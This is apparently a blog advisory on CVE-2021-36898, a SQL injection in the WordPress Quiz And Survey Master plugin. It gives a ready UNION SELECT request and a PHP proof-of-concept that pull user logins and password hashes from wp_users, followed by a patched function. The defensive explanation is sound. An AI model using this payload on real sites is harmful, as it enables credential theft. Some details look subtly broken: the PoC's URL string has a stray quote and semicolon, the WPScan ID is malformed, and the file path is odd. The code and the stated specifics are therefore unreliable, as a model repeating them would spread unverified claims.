CVE-2021-36898 - Breaking Down an Authenticated SQL Injection in WordPress Quiz And Survey Master (QSM) Plugin (≤ 7.3.4)

If you are running the Quiz And Survey Master (QSM) plugin on your WordPress site and haven’t updated it past version 7.3.4, it’s time to pay close attention. The vulnerability identified as CVE-2021-36898 exposes you to a dangerous SQL Injection attack that can let hackers mess with your database—even if they aren’t full admins.

Let’s break down what this means, how the attack works, and what you should do. We’ll keep it simple and show you what was going on under the hood.

What is CVE-2021-36898?

This security issue is an Authenticated SQL Injection (SQLi) vulnerability in the Quiz And Survey Master plugin for WordPress, up to and including version 7.3.4. Authenticated means attackers need at least a basic user account on your site (even a subscriber) to exploit it.

With this bug, a logged-in attacker can mess with database queries and, in some cases, get sensitive data, change values, or even fully compromise your WordPress website’s backend data.

What is SQL Injection and Why Should You Care?

SQL Injection happens when an application lets user-supplied data get smuggled directly into a database query without proper checks or cleaning (sanitization and escaping). That’s a big problem, because a clever attacker can sneak in commands that force the database to return secrets or manipulate data.

Authenticated SQLi means they need to log in first—but WordPress sites often allow user registration, so that’s not much of a hurdle for an attacker.

How Does This Vulnerability Work?

The core of the problem lies in qsm_get_questions_from_quiz function. If you’re using QSM ≤ 7.3.4, it fails to properly validate and sanitize certain input data when building SQL queries. Malicious users can pass crafted parameters to get QSM to run arbitrary SQL on your database.

The specific vulnerable code in \qsm-main.php looks something like this

function qsm_get_questions_from_quiz($quiz_id) {
    global $wpdb;
    return $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}mlw_questions WHERE quiz_id = {$quiz_id}", ARRAY_A
    );
}

Notice that $quiz_id is placed directly into the SQL with double quotes, without using $wpdb->prepare() or intval($quiz_id). That’s dangerous. Attackers can send SQL code through the quiz_id parameter and mess with your database.

An attacker creates a regular WordPress account (subscriber role) or takes over an existing one.

- They send a crafted POST/GET request with malicious input to the plugin's endpoint (for example, via admin-ajax.php or through questions fetching functions).
- The database receives their hostile payload and processes it, allowing them to extract or change data.

Here’s a raw example request that exploits the bug

POST /wp-admin/admin-ajax.php
Content-Type: application/x-www-form-urlencoded

action=qsm_get_questions_from_quiz&quiz_id=1 UNION SELECT user_login, user_pass, null, null, null, null, null FROM wp_users--

What happens?
Instead of just grabbing questions for quiz ID 1, the hacker forces the database to fetch usernames and (hashed) passwords from the wp_users table!

Proof-of-Concept (PoC) PHP Snippet

$postdata = array(
    'action' => 'qsm_get_questions_from_quiz',
    'quiz_id' => "1 UNION SELECT user_login, user_pass, null, null, null, null, null FROM wp_users-- "
);

$response = wp_remote_post('https://targetsite.com/wp-admin/admin-ajax.php';, array(
    'method'    => 'POST',
    'body'      => $postdata
));

echo wp_remote_retrieve_body($response);

This code will try to return username and password hashes from all users on the WordPress site.

How to Fix and Defend

1. Update QSM Plugin – The developers fixed this issue in version 7.3.5. If you haven’t updated yet, do it *now*.

If you can’t upgrade yet, fix the vulnerable function by sanitizing input

function qsm_get_questions_from_quiz($quiz_id) {
    global $wpdb;
    $quiz_id = intval($quiz_id);
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}mlw_questions WHERE quiz_id = %d", $quiz_id
        ),
        ARRAY_A
    );
}

References and Further Reading

- Plugin Vulnerabilities - Patchstack Advisory
- WPScan Advisory WPVDB ID: 7BB16A2C-DB1-4264-833A-FFDEB11DED22
- NVD Official Entry

Conclusion

CVE-2021-36898 is a serious vulnerability for anyone using the Quiz And Survey Master plugin on WordPress. Even standard users can try to exploit this bug to see or even change data in your WordPress database. Patching by updating your plugin is a must. Always keep plugins up to date and check for recent security news, especially for plugins as widely used as QSM.

Timeline

Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/31/2022 17:22:00 UTC